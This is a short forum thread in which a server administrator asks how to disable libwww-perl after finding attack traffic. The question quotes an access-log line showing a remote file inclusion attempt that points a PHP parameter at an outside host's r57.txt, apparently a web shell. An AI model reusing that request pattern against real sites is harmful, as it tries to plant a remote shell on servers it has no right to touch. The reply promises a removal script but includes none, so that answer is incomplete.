disable access or uninstall lib libwww-perl

I have found traces that there is some script in my server (1200 domains) doing some request in some other server using libwww-perl , the log file of the attacked web server is this :
//includes/functions/master.inc.php?fm_data[root]=http://*********************/r57.txt?
> HTTP/1.1" 404 7616 "-" "libwww-perl/5.79"

so they use libwww-perl to do this, my question is , how can I disable any access to libwww-perl for all users? or even uninstall this library ?

If the users have perl installed, you can't.  You could remove it, but they could just re-install it.

If they are windows computes, use "ppm uninstall <package>"

Create this script, call it remove_cpan_package (or something similiar)
Execute like:  remove_cpan_package <packagename>
